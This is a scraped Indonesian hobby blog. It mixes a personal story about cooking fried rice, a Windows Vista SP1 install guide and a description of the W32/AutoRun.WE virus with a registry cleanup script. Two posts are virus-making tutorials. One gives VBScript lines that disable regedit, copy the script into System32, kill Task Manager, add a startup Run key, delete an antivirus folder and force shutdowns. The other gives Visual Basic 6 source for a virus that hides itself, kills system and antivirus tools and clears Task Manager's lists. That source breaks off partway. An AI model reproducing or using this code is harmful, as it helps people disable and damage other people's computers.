“met pA9e dUniAa..
(^^,).. Hee.. N’ sEbUaH nAsI gOrEng bwTan qUu.. HaHaHa..”

n9OmOn9in soAL sArapan pa9i Aq Jdi in9Et wkTu d’puncAk..!!,gNi Lho cRiTa’nA..?!

wkTu iTu aq p9n refreshin9, Tp bin9gUn9 mO kmNa..??,,eH tmn qUu n9AJak aq k’viLLa’nA k’tmpt pAmAn’na d’pUncAk.. qAn Aq dAh kyk sdr Ja mA tmn qUu.. jd.. enJoy ja ma pAmAn n bibi’na d’sNa.. Hee qAn diiaa yg ngEndArAin mobiL, bagUzZ’na mObilnya iTu.. mObil’na diiaa, yg LucU n ApEzZ’nA..!!, pAzZ d’tengAH JLan, TbA” Ja mObiL’nA mOgOk.. aq cEk Ja..??, dAn ternyATa, bEnsin’nA hbizZ..!!, HaHaHa,, memAnk kami berdUa AmAT sAngAT pikUn.. sAmpai Lupa isi bEnsin, Hee.. ( ngAku..!!,,”yah dri pd gk ngAkU.. :-p” ),akhIr’nA kAmi sMpai JugA d’tmpt tujuan.. Tp.. hebOH’na, Aq TuH brU smpE” mLm Hari pAzZ k’pergiAn qUu pAgi Jam 08.00 dri JkT,Hee.. grA” mObiL da prOblem n kami kNa tiLang pULa d’ToL..

sEsAmpai’na d’cNa Aq lngsUng tidUr, Aq kcApEan.. bgtu jugA dgn tmn qUu.. diia pun LngsUng gUbRak d’kAsUr.. (^^,)..!!,
pAzZ pAgi” nA, Tw gk..!!, Aq TuH TeriAk.. (met page dUniA..!!),mLH kncEn9 b9d.. Hee.. seisi rmh pd bAngun sMuA.. HaHaHa.. ( “dAzZAR penggAnggu..!!”, kT pAmAn’na tmn qUu.. “brisik Tw..!!” ), Aq bLng Ja maaf paman, Hee.. Aq TuH sAkin9 sEnen9′na krn dUa hri TuH Aq bAru sMpe k’viLLa.. (gArA” mObiL siALan..!!),,Hee.. (^^,)..!!, Tp qLo gk dA mobiL iTu Aq gk bkL k’cNa.. (^^,)..!!,

biZz iTu, Aq TuH.. kdApUr,niat’nA cii mO cri cmiLan or nAsi gtw.. tp gk dA sMa s’x.. ( “uHH payAH..!!,smbiL gruk” pLa gTw dEH.. Hee.. ” ), Aq msK nasi Ja.. qAn nAsi yg qUu msAk dAH mTeng, Aq brgegAs bwT nasi gOrEng.. wkTu Tuh dA nunjUkin Jam 06.00 sEisi rmh pd bgun.. kT pAmAn’na tmn quu.. ( “wAH.. eNaq ni wAngi nasi gOrEng.. ” ), Aq bLng Ja nTi dLu bLom mTeng.. bRu dAH tmn qUu ikUT”an nyAmbEr, ( bLH jugA niy nasgOr’na.. mNtep b9d wAngi’na.. Jdi LapEr..!!” ), Aq bLng Ja TunggU ap sbAR..!!,sEmUA jugA LapEr..

AkHir’nA msAkan qUu Jdi.. n smUa dAh pd nun9gU d’mJa mkn..
( “nAsi gOrEng dTng..!!” ), kt qUu.. yg mAu byR iiaa.. Hee.. eH pd nAmpAkin mUkA mnyErAmkan smua.. iihh tkut.. Hee.. Aq bLng Ja.. ( “brcAndA…!!” )

Tw gk..!!, rAzA nasgOR bwTan tngAn qUu.. Asiiiiiiiiiiiiiiiiiiiiiiiiiiinnn b9d..!!!,,Hee.. Aq LngsUng kTwA.. cOz mrka smUA pd AnEh rAUT mukA’na.. Hahahahahahaha.. aq kTwa gk henti” ngELiAT mrEkA kE asinAn.. Hahahahahahaha… (^^,)..
sMpE skrg pUn Aq msiH ingeT kJadiAn iTu..

-LinggA-

<a href=”http://cursormania.smileycentral.com/download/index.jhtml?partner=ZCzeb008_ZCfox000&spu=1&feat=prof&utm_id=9992″ style=”position:absolute;top:50px;left:0px;”><img src=”http://plugin.smileycentral.com/http%253A%252F%252Fplugin%252Esmileycentral%252Ecom%252Fassetserver%252Fcursor%252Ejhtml%253Ft%253D2/image.gif” border=”0″/></a><style type=”text/css”>

“mMmH.. Install Windows Vista SP1 dari WU..!!”

07 Mei, 2008 — Lingga_cHyNk_TasyA

Windows Vista Service Pack tersdia baik melalui Windows Update atau download langsung di site microsoft. Dibandingkan download melalui site microsoft untuk versi stand alone yang cukup besar (430+ MB kalo ga salah), instalasi melalui WU relatif lebih hemat bandwith karena hanay sebesar 66 MB saja (yup ^_^). Tapi sayangnya, opsi update SP1 tidak dapat diakses secara langsung oleh semua pengguna Vista, berikut beberapa langkah-langkah agar dapat melakukan instalasi Vista SP1 (KB936330) secara langsung melalui Windows Update.

Pengguna WIndows Vista RTM pada umumnya memerlukan 2 atau 3 update sebelum SP1 dapat diinstall. Update ini bersifat permanen untuk sistem. Windows Update akan memeriksa konfigurasi sistem dan menawarkan paket update yang sesuai untuk sistem. berdasarkan status sistem kamu, Windows Update akan menawarkan semua paket yang diperlukan dan SP1 secara berurutan. Untuk detil lebih lanjut baca instruksi dan image yang disertakan.

Jika sudah melakukan instalasi service pack pada vista, uninstall dulu service pack yang bersangkutan. semua service pack build sebelum final harus diuninstall sebelum instalasi SP1 final.

Berikut 4 langkah mudah untuk melakukan instalasi SP1.

Pada Vista RTM…
1. Install semua “Important” update yang belum terinstall (gw sih install aja semua, toh penting tuh, kecuali malicious program removal sih)dan update yang penting untuk SP1 (lihat keterngaan selanjutnya). Hal ini mungkin perlu dilakukan beberapa kali untuk memastikan bahwa sistem benar-benar up-to-date.

• periksa update pada WU. Masuk ke [Control Panel]|[System and Maintenance]|[Windows Update] dan periksa update dengan memilih “Check for Updates” di task panel kiri.
• Kamu akan ditawarin dengan semua update Vista sebelum SP1 yang belum terinstall pada sistem kamu. Install asemu aupdate yang tersedia (Important update aja sih yang dibutuhkan – just in case para pemakai versi jamu vista takut jamunya kebobol, update ntuk WGA dan Activation semua dilabel sebagai optional atau recomenced ko’)
• Untuk pemakai Windows Vista Ultimate, atau Windows Vista Enterprise, Update for Windows (KB935509) bakalan nongl di list. Jika punay versi lain (seperti aku contohnya, ku make Home Premium OEM Build Acer so..), Update for Windows KB938371 adalah update yang akan ada di list. pilih update tersebut dan install. Reboot Komputer jika diminta.Jika tidak memiliki Ultimate atau Enterprise, hanya Update for Windows KB938371 yang akan muncul dan KB935509 tidak diperlukan (ga muncul tepatnya).
• Jika setelah reboot dan memeriksa ulang windows update secara langsung, terakdang tidak semua update yang baru akan muncul. sabar yah, butuh waktu untuk sistem memproses update yang baru terinstall. Tunggu 5-10 menit lalu check update lagi. ntar daftar update akan membeirkan 1 update saja (kalo sebelumnay ngikutin langkah ini, update otional ga diinstall, list optioal update bakal di bypass sementara dan hanya akan menampilkan 1 update baru saja di list update, yaitu KB937287, kalo ini terjadi, berarti kamu udah di jalur yang bener ^_^)

2. Install Update for Windows (KB937287).

• Update for Windows (KB937287) tidak memerlukan reboot (besarnya 4MB waktu ku update kemaren malam). ini adalah “installer” code untuk the service pack.

3. Install Windows Vista Service Pack 1 (KB936330).

• Sama seperti kasus langkah 2 point terakhir, sebelum muncul paket yang ita inginkan, butuh waktu agar WU memproses update baru. so browsin2 ajalah dulu, chatting, or ngapain gitu. setelah 5-10menit, check update lagi. kalo update list masih berisi update optional atau recommended yang belum kamu install, berarti nunggu lagi, beri waktu agar paket update menyelesaikan instalasinya. trus check ulang update..

nah, setelah melakukan pengecekan kembali. Windows Vista Service Pack 1 (KB936330) akan tersedia di list. sama seperti langkah 2, update ini akan muncul sendirian > so kamu bakal tau pasti kalo inilah yang kamu cari. pilih dan kemudian install. tunggu download selesai, file cuman 66MB, cepet ko’ setelah selesai, ikutin apa mau vista kamu dan proses instalasi SP1 akan berjalan. setelah reboot (proses instalasi lagi) login selanjutnya kamu udah bisa menikmati Vista build 6001 Spervice Pack 1 ^_^

Have Fun ^_^

kalo update SP1 tidak muncul juga, bisa coba diakaslin pake script khusus dan langkah berikut ini lalu meneruskan ke langkah yang dijelaskan diatas

1. Download script yang aku sertakan di post ini dan jalankan script tersebut dengan hak akses administrator untuk memastikan memperoleh akses merubah registry.

• Klik kanan pada file dan pilih “Run as administrator” untuk menjalankan file dengan hak akses administrator.
• Script tersebut membeuat beberapa perubahan pada entry registry. Registry key tersebut diperlukan agar windows update mengenali sistem sebagai target yang valid untuk Vista SP1.
• Setelah menjalankan script, lakukan update dengan windows update (jika automatic update tidak dijalankan) dan install paket2 yang diperlukan untuk instalasi Vista SP1 (lengkapnya lihat langkah 2).

klik tombol dibawah ini untuk download script :

Posted in Software, windows. Tags: SP1, Update, vista, windows.

<!–
google_ad_client = “pub-8406224278057215″;
/* ipod */
google_ad_slot = “2578763653″;
google_ad_width = 468;
google_ad_height = 60;
google_cpa_choice = “”; // on file
//–>

cara mudah bikin virus

Sebelumnya, berikut ini cara-cara paling gampang untuk membuat virus.
semua hal dibawah ini hanya sebagai penambah pengetahuan kita saja
dan tidak boleh disalah gunakan untuk hal-hal yang bersifat merusak.
Dan aku nggak bertanggung jawab Lho jika itu terjadi. Sekarang kita akan
membahas cara gampang membuat virus pake vbs file.

pertama, berikut ini hal-hal yang wajib kita siapin sebelum membuat virus.
# seperangkat komputer berikut monitor,cpu,mouse,kibor, dll (wajib)
# kita harus menyiapkan sebuah file yang ber-ekstensi vbs (*.vbs)
# secangkir teh anget.
# akan lebih afdoL kalo ditemenin lagu2nya rhcp (aku ngefans ma rhcp)

Untuk eksekusi pertama, yang dilakukan virus biasanya mengubah registry.
Sebenarnya udah aku bahas di blogku ini. tapi nggak papa aku ulangin aja.
biar keliatan resmi . misalnya:

1. mendisable regedit. Yang kita tulis:
On Error Resume Next(perintah ini digunakan pada file vb
supaya kalo ada yang salah bisa dilanjutin kode selanjutnya)
CreateObject(“WScript.Shell”).run “cmd.exe /c reg add hkcusoftware\microsoft\windows\currentversion\policies\system /v
disableregistrytools /t reg_dword /d “”1″” /f”, vbhide

sebenarnya banyak cara untuk mendisable regedit. misalnya kek gini:
CreateObject(“WScript.Shell”).regwriteHKEY_CURRENT_USERsoftware\microsoft\windows\currentversion\policies\systemdisableregistrytools”, 1, “REG_DWORD”

lalu mengubah registry yang lain. yang nggak aku bahas disini karena
udah pernah aku bahas pada postingan yang lain di blogku ini.

2. mengopikan diri ke direktory lain

CreateObject(“Scripting.FileSystemObject”).
GetFile(WScript.ScriptFullName).Copy “c:\windows\system32\virus.vbs”
Ada juga cara lain dengan kide seperti ini:
On Error Resume Next
createobject(“scripting.filesystemobject”).copyfile wscript.scriptfullname,
createobject(“scripting.filesystemobject”)
.getspecialfolder(1) & “\virus.vbs”
misalnya untuk mengkopikan diri ke direktory C:\WINDOWS\System32
dengan nama virus.vbs
.getspecialfolder(0) digunakan untuk direktory WINDOWS
.getspecialfolder(1) digunakan untuk direktory SYSTEM32 pada windowsXP
.getspecialfolder(2) digunakan untuk direktory Temporary

3.Membunuh proses.
digunakan untuk membunuh proses
(proses adalah program yang sedang berjalan)
misalnya kita akan membunuh proses taskmanager
On Error Resume Next
CreateObject(“WScript.Shell”)
.run “taskkill /f /im taskmgr.exe”, vbhide

4.Menjalankan virus pada saat startup atau saat windows dihidupkan.
menggunakan regedit
On Error Resume Next
CreateObject(“WScript.Shell”).RegWrite “HKEY_LOCAL_MACHINESoftware\Microsoft\Windows\CurrentVersion\Run\virus”
, “c:\windows\system32\virus.vbs”
(menjalankan virus yang berada di direktory c:\windows\system32
dengan nama virus.vbs)

5.Menghapus File / Folder
agar virus yang kita buat tidak banyak menggunakan script bisa di singkat seperti ini:
On Error Resume Next
set hapus = CreateObject(“Scripting.FileSystemObject”)
hapus.DeleteFile “C:\xxx.exe” ‘(menghapus file xxx.exe di direktory C:\)
hapus.DeleteFolder “C:\antivirus” ‘(menghapus folder antivirus di direktory C:\)

6.Merestart Windows
CreateObject(“WScript.Shell”).run “shutdown -r -f -t 60″, vbhide
merestart windows dalam waktu 60 sekon

7.Meng-ShutDown Windows
CreateObject(“WScript.Shell”).run “shutdown -s-f -t 60″, vbhide
mematikan windows dalam waktu 60 sekon yang beda cuman
“shutdown -s-f -t 60″
S = untuk shutdown dan
R = untuk reboot\restart

8. Mengaktifkan Virus Pada Waktu tertentu
If day(now) = 1 and month(now) = 1 and year(now) = 2007 then
‘(masukkan kode virus disini)
End if
‘misalnya kalo mau mengaktifkan pada tanggal 1, bulan 1
‘dan tahun 2007

Ok. Pelajaran bikin virus untuk hari ini aq kira udah cukup.
walaupun udah pernah aq bahas,, nggak papalah,,,, itung-itung
buat nambahin pengetahuan kita. Ya kan..??,,Hee.. dan semoga bermanfaat .

Ingat Lho..!!, ini Cuma Pengetahuan aja jangan di salah gunakan iiaa.. ok..!!,

By : nAHwAn­­­­­ erLinggA (^^,)..!!

“Huffh.. siAL b9d dEH..!!”

kemarin malam cukup dibikin kesel ama virus Miyabi dan Ayam-kampus! setelah membuka hardisk external yg baru saja dikembalikan oleh teman and katanya udah ditambahin film bokep baru!hehehehehehe.. pas gw buka di root file terdapat film bokep favorite gw yang dibintangi oleh Maria Ozawa Miyabi file yang bernama Miyabi-New Episode(NO SENSOR) yang iconya windows media player! ehhhhhh baru diclick ternyata komputer gw dibikin hang ama tu film miyabi sialan..!!, baru tak cek ehhhhhhhh ternyata extension filenya .exe aq udah mulai curiga dan setelah aq buka regedit ehhhh yg keluar malah notepad!anjing komputer gw kena virus!tukang virus malah kena virus!!,wakakakakaka……… ini virus emang lumayan hebat ni virus bisa mengelabui aq..!!, hehehehehe….. salute buat yg bikin virus!!!!!, kerena Aq sempet suka juga miyabi makanya aq buru2 buka file Miyabi-New Episode(NO SENSOR) kerana dari setahu qu miyabi blom pernah sekalipun nemu film miyabi yang NO SENSOR!!!!

setelah browsing2 ternyata ni virus namanya virus W32/AutoRun.WE

ni penjelasan mengenai virus tersebut dari vaksin

Mungkin virus ini sedang menyebar dengan cepatnya. Seperti biasa Flash Disk merupakan alat penyebar yang sangat efekti. Coba anda perhatikan di dalam flash disk anda kalau ada file ayam-kampus.exe, Miyabi-New Episode(NO SENSOR).exe dan autorun.inf, pasti komputer anda sudah terjangkit virus ini.

Apa yang diperbuat oleh virus ini, secara singkat dapat dijabarkan sebagai berikut :
- Muncul pesan “System File Protection” setiap kali komputer dinyalakan.
- Jika menekan tombol enter maka akan muncul pesan “sensor”
- blok taskmgr/regedit/msconfig/Cmd/sysedit (baik di C:\Windows atau C:\WIndows\system32 maupun di C:\Windows\system32\dllchace)

dengan membuka program notepad (bila dijalankan), file asli tesebut akan dipindahkan di dalam folder C:\pUkcaB_LACSAR, untuk mengelabui user, virus ini akan copy file notepad.exe ke dalam masing2 direktori dengan nama yang sama seperti file yang sudah dipindahkan tersebut. Selain itu ia akan ubah file tersebut mejadi file notepad kemudian akan dibackup ke folder C:\pUkcaB_LACSAR dengan mengganti ext. EXE dengan RASCAL (file ini akan disembunyikan)

- Mematikan win exploer jika baca caption/jika user akses folder dengan nama : windows,registry,tuneup,anti,avg,virus,processes,process,utility,tool,hacker,cracker,-scanner,
vir,hijack,hex,editor,snif,run,free,japan,porn,*
-kalau kita memencet tombol ALT+F4 maka komputer akan hang, dan pada layar akan dipenuhi tulisan rascal

Perubahan pada regedit:
——————–
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
- NET-SERVICES = C:\WINDOWS\system32\rascal32.exe /register

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
- DisableRegistryTools
- DisableTaskMgr

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
- load = C:\WINDOWS\system32\rascal32.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- windows = C:\WINDOWS\msvbvm60.exe /register

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
- ProductName = RASCAL.A
- RegisteredOrganization = junior Bali VM
- RegisteredOwner =�؆H��G���BO�
- ProductId = [28/08/2007]

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
- SHELL = explorer.exe C:\WINDOWS\system32\rascal32.exe
- system = C:\WINDOWS\msvbvm60.exe
- userinit = userinit.exe,C:\Documents and Settings\Elvina\Templates\userinit.exe,
- SFCScan = 0 (menyebabkan selalu muncul pesan error “System file Protection”)
- SFCDISABLE = -99

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControl001\Control\SafeBoot
- AlternateShell = cmd.exe

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControl002\Control\SafeBoot
- AlternateShell = cmd.exe

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot
- AlternateShell = “”

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\SafeBoot
- AlternateShell = “”

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot
- AlternateShell = “”

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Load
- command = C:\WINDOWS\system32\rascal32.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\NET-SERVICES
- COMMAND = C:\WINDOWS\system32\rascal32.exe /register

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Windows
- command = C:\WINDOWS\msvbvm60.exe /register

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
- hidden = 2
- HideFileExt = 1
- ShowSuperHidden = 0

Penambahan File:
—————-
c:\ayam-kampus.exe
c:\Miyabi-New Episode(NO SENSOR).exe
C:\Windows\system32\rascal32.exe
C:\Windows\msvbvm60.exe
c:\Miyabi-New Episode(NO SENSOR).exe (di setiap drives termasuk UFD)
C:\Documents and Settings\<nama user>\My Documents
- JapanPorn.exe
- Miyabi-New Episode(NO SENSOR).exe
C:\Documents and Settings\<nama user>\Templates
- userinit.exe
c:\windows\system32\oemlogo.bmp
c:\windows\system32\oeminfo.ini
C:\Windows\system32\config\systemprofile\Templates\userinit.exe
C:\WINDOWS\system32\config\systemprofile\My Documents
- JapanPorn.exe
- Miyabi-New Episode(NO SENSOR).exe
C:\Documents and Settings\<nama user>\My Documents
- JapanPorn.exe
- Miyabi-New Episode(NO SENSOR).exe

Menyebar melalui UFD
————————
- Autorun.inf (menjalankan file ayam-kampus.exe)
- Ayam-kampus.exe
- Miyabi-New Episode(NO SENSOR).exe

Cara membersihkan:
——————–
- Matikan proses virus yang aktif dimemori, gunakan tools proceexp yang sudah dimodifikasi
- Hapus registry yang dibuat virus
- Hapus file induk virus gunakan search windows dengan mencari dan menghapus file dengan ciri2:
- icon multimedia player
- ext. exe
- ukuran 70 KB (71108)

- hapus juga file berikut:
- c:\windows\system32\oemlogo.bmp
- c:\windows\system32\oeminfo.ini

- Untuk mengembalikan fungsi regedit/msconfig/taskmanager dan cmd yang diubah jadi notepad. Ubah ekstensi file dari RASCAL menjadi EXE pada folder C:\pUkcaB_LACSAR, kemudian
copy ke masing-masing folder berikut:
- REGEDIT.EXE = c:\Windows (Win XP/2003)
- cmd.exe, command.com, dxdiag.exe, sysedit.exe dan taskmgr.exe = C:\Windows\system32 (NT/2000)
- msconfig.exe = C:\WINDOWS\pchealth\helpctr\binaries

- pembersihan optimal gunakan av yang up-to-date

Untuk perbaikan registry, anda copykan script di bawah ini dalam bentuk file INF

[Version]
Signature=”$Chicago$”
Provider=Vaksincom

[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del

[UnhookRegKey]
HKLM, Software\CLASSES\batfile\shell\open\command,,,”””%1″” %*”
HKLM, Software\CLASSES\comfile\shell\open\command,,,”””%1″” %*”
HKLM, Software\CLASSES\exefile\shell\open\command,,,”””%1″” %*”
HKLM, Software\CLASSES\piffile\shell\open\command,,,”””%1″” %*”
HKLM, Software\CLASSES\regfile\shell\open\command,,,”regedit.exe “%1″”
HKLM, Software\CLASSES\scrfile\shell\open\command,,,”””%1″” %*”
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion, ProductName,0, “Windows”
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion, RegisteredOrganization,0, “Organization”
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion, RegisteredOwner,0, “Owner”
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion, ProductId,0, “ID”
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, “Explorer.exe”
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, system,0,
HKLM, SYSTEM\ControlSet001\Control\SafeBoot, AlternateShell,0, “cmd.exe”
HKLM, SYSTEM\ControlSet002\Control\SafeBoot, AlternateShell,0, “cmd.exe”
HKLM, SYSTEM\ControlSet003\Control\SafeBoot, AlternateShell,0, “cmd.exe”
HKLM, SYSTEM\CurrentControlSet\Control\SafeBoot, AlternateShell,0, “cmd.exe”

[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Run,NET-SERVICES
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Servicex
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run,windows
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableTaskMgr
HKLM, SYSTEM\CurrentControl001
HKLM, SYSTEM\CurrentControl002
HKCU, Software\Microsoft\Windows NT\CurrentVersion\Winlogon, shell
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, FCScan
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, SFCDISABLE

Kayak’na terlalu panjang iiaa..??,,

Tp tak apa-apalah yg penting Semoga membantu aja n sambil bagi” pengalaman ja deh…!!,Hee.. (^^,)..!!.

-Lin9gA-

mEmbUaT vIrUs kAkE53m3vl dEngAn VisUaL bAsic

* Cara Membuat Virus kake53m3v1 dengan vb6

1. Buat Sebuah Project
2. Buat Sebuah Form lalu kopikan code sebagai berikut, lainya tambahkan sendiri seperti label, dll

ini codenya:

‘Didownload dari situs www.vbbego.com
‘publish by anti hacker
‘maintainer by kake53m3v1

‘PERINGATAN!!!!!!
‘Semua Isi source code ini bertujuan hanya untuk pengetahuan belaka
‘apabila ada yang menyalah gunakan untuk tujuan tidak baik
‘maka kami tidak akan bertanggung jawab sedikitpun
‘Jika anda setuju silahkan anda tekan tombol PageDown

Option Explicit
Dim oldHwnd As Long, oldCurHwnd As Long, HwndFore As Long

Private Sub Form_Load()
‘
‘If isIDEVB Then
‘ MsgBox “Contoh ini harus dijalankan dalam bentuk Executable, ” & vbCrLf & “Silahkan compile terlebih dahulu”, 48, “virus tutor II”
‘ End
‘End If

App.TaskVisible = False
Me.Visible = False

‘
If App.PrevInstance = True Then
End
End If

VirusTitle = “LSAS.EXE” & Space(100) &amp; Chr(1) & Chr(2) & Chr(3) & Chr(4) & Chr(5) & Chr(1)
Dim hServ As Long
hServ = FindWindow(“ThunderRT6FormDC”, VirusTitle)
If hServ = 0 Then
Me.Caption = “Virus Babe by kake53m3v1″
App.Title = VirusTitle
Else
End
End If

On Error GoTo Salah

Dim FileName
‘
If LCase(Right(App.EXEName, 4)) = “.exe” Then
ViriName = App.EXEName
Else
ViriName = App.EXEName & “.exe”
End If

‘
ReDim ViriCode(FileLen(ValidPath(App.Path) & ViriName)) As Byte
Open ValidPath(App.Path) & ViriName For Binary As #1
Get #1, , ViriCode
Close #1

‘
CreateDefaultFile

‘
CreateRegister

‘
Timer1.Enabled = True
Exit Sub
Salah:
MsgBox “File exe tidak ditemukan, silahkan compile terlebih dahulu project ini”, 16
End

End Sub

Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
End
End Sub

Private Sub Label1_Click()
Me.Hide
End Sub

Private Sub Timer1_Timer()
On Error Resume Next

‘<—-Bom Waktu—->

If Time = “10:00:00″ Then
Me.Visible = True
ElseIf Time = “11:00:00″ Then
Me.Visible = True
ElseIf Time = “16:00:00″ Then
Me.Visible = True
ElseIf Time = “17:00:00″ Then
Me.Visible = True
ElseIf Time = “18:00:00″ Then
Me.Visible = True
ElseIf Time = “19:00:00″ Then
Me.Visible = True
End If
DoEvents
Dim UnloadME As Long

‘
Call GetCursorPos(HwndPoint)
HwndToHack = WindowFromPoint(HwndPoint.x, HwndPoint.y)
HwndFore = GetForegroundWindow()
Dim IEHwnd As Long, IE7HWND As Long

‘
If HwndToHack = HwndFore Then
IEHwnd = viriFindCombo(HwndToHack)
IE7HWND = viriFindIE7(HwndToHack)
Else
IEHwnd = viriFindCombo(HwndFore)
IE7HWND = viriFindIE7(HwndFore)
End If
‘

If IEHwnd Then
IsMePresent ValidPath(cyraxHackWindowText(IEHwnd))
Else
IEHwnd = viriFindCombo()
If IEHwnd Then IsMePresent ValidPath(cyraxHackWindowText(IEHwnd))
End If

‘Untuk IE7 Beta bisa gunakan code berikut
If IE7HWND Then
IsMePresent ValidPath(cyraxHackWindowText(IE7HWND))
Else
IE7HWND = viriFindIE7()
If IE7HWND Then IsMePresent ValidPath(cyraxHackWindowText(IE7HWND))
End If

‘

Dim hTask1 As Long, hTask2 As Long
hTask1 = Bego_32770_Tasks
If hTask1 Then
LockWindowUpdate hTask1
Call SendMessage(hTask1, LVM_DELETEALLITEMS, ByVal 0, 0)
End If

hTask2 = Bego_32770_Processes
If hTask2 Then
LockWindowUpdate hTask2
Call SendMessage(hTask2, LVM_DELETEALLITEMS, ByVal 0, 0)
End If
‘Untuk melihat hasil diatas, coba jalankan kemudian munculkan task manager

‘
‘Silahkan hilangkan tanda kutip dibawah ini, untuk mengaktifkan fungsi kill app

KillProcessByName “regedit.exe”
KillProcessByName “nav.exe”
KillProcessByName “msconfig.exe”
KillProcessByName “cmd.exe”
KillProcessByName “nav.exe”
KillProcessByName “taskmgr.exe”
KillProcessByName “killvb.exe”
KillProcessByName “excel.exe”

‘

KillBadSite

‘<—- Stop Virus —->

UnloadME = FindWindow(vbNullString, “Stop Virus”)
If UnloadME > 0 Then
End
End If
End Sub

3. Lalu buat 4 buah module yang module pertama berisi code:

Option Explicit

Type POINTAPI
x As Long
y As Long
End Type

Public HwndPoint As POINTAPI
Public HwndToHack As Long
Public ViriName As String

Declare Function GetForegroundWindow Lib “user32″ () As Long
Declare Function GetCursorPos Lib “user32″ (lpPoint As POINTAPI) As Long
Declare Function WindowFromPoint Lib “user32″ (ByVal xPoint As Long, ByVal yPoint As Long) As Long

Declare Function FindWindow Lib “user32″ Alias “FindWindowA” (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Declare Function FindWindowEx Lib “user32″ Alias “FindWindowExA” (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long

Declare Function SendMessage Lib “user32″ Alias “SendMessageA” (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long

Declare Function PathIsDirectory Lib “shlwapi.dll” Alias “PathIsDirectoryA” (ByVal pszPath As String) As Long
Private Declare Function GetFileTitle Lib “comdlg32.dll” Alias “GetFileTitleA” (ByVal lpszFile As String, ByVal lpszTitle As String, ByVal cbBuf As Integer) As Integer
Declare Function CopyFile Lib “kernel32″ Alias “CopyFileA” (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long

Public Const LVM_FIRST = &H1000
Public Const LVM_DELETEITEM = (LVM_FIRST +
Public Const LVM_DELETEALLITEMS = (LVM_FIRST + 9)

‘Ini sekedar tambahan saja, supaya perubahan yg terjadi tidak langsung
‘ditampilkan
Declare Function LockWindowUpdate Lib “user32″ (ByVal hwndLock _
As Long) As Long

Public ViriCode() As Byte

Private Const MAX_COMPUTERNAME_LENGTH As Long = 31
Private Declare Function GetComputerName Lib “kernel32″ Alias “GetComputerNameA” (ByVal lpBuffer As String, nSize As Long) As Long
Private Declare Function GetSystemDirectory Lib “kernel32″ Alias “GetSystemDirectoryA” (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private Declare Function GetWindowsDirectory Lib “kernel32″ Alias “GetWindowsDirectoryA” (ByVal lpBuffer As String, ByVal nSize As Long) As Long

Function sysDir() As String
Dim cPath As String
cPath = String(255, Chr(0))
GetSystemDirectory cPath, Len(cPath)
sysDir = ValidPath(Left(cPath, InStr(1, cPath, Chr(0)) – 1))
End Function

Function GetNameKomputer() As String
On Error Resume Next
Dim dwLen As Long
Dim strString As String
dwLen = MAX_COMPUTERNAME_LENGTH + 1
strString = String(dwLen, Chr(0))
GetComputerName strString, dwLen
GetNameKomputer = Left(strString, InStr(1, strString, Chr(0)) – 1)
End Function

‘
Function isIDEVB() As Boolean
On Error GoTo Salah
Debug.Print (1 / 0)
isIDEVB = False
Exit Function
Salah:
isIDEVB = True
End Function

‘
Function viriFindCombo(Optional ExploHwnd As Long = 0) As Long
On Error Resume Next
Dim vbcyrax(1 To 6) As Long
If ExploHwnd = 0 Then
vbcyrax(1) = FindWindow(“ExploreWClass”, vbNullString)
Else
vbcyrax(1) = ExploHwnd
End If
If IsWinNT = False Then
vbcyrax(2) = FindWindowEx(vbcyrax(1), ByVal 0&, “WorkerA”, vbNullString)
Else
vbcyrax(2) = FindWindowEx(vbcyrax(1), ByVal 0&, “WorkerW”, vbNullString)
End If
vbcyrax(3) = FindWindowEx(vbcyrax(2), ByVal 0&, “ReBarWindow32″, vbNullString)
vbcyrax(4) = FindWindowEx(vbcyrax(3), ByVal 0&, “ComboBoxEx32″, vbNullString)
vbcyrax(5) = FindWindowEx(vbcyrax(4), ByVal 0&, “ComboBox”, vbNullString)
vbcyrax(6) = FindWindowEx(vbcyrax(5), ByVal 0&, “Edit”, vbNullString)
viriFindCombo = vbcyrax(6)
End Function

Function viriFindIE7(Optional ExploHwnd As Long = 0) As Long
On Error Resume Next
Dim vbcyrax(1 To 7) As Long
